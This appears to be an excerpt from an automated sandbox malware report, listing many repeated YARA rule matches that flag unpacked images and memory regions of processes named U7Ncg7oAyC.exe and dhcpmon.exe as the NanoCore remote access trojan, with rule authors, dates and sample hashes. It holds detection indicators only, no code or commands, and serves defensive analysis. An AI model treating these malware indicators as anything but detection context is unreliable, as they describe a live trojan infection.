        Source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.5140000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.5140000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.5140000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.dhcpmon.exe.2f49658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.2f49658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.2.dhcpmon.exe.2f49658.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000027.00000002.453407372.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.520939639.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.520939639.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000006.00000002.520939639.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 00000027.00000000.422202899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000027.00000000.422202899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000027.00000002.450934240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000027.00000002.450934240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000027.00000000.420827923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000027.00000000.420827923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000027.00000000.419127267.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000027.00000000.419127267.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.520899025.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.520899025.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000006.00000002.520899025.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
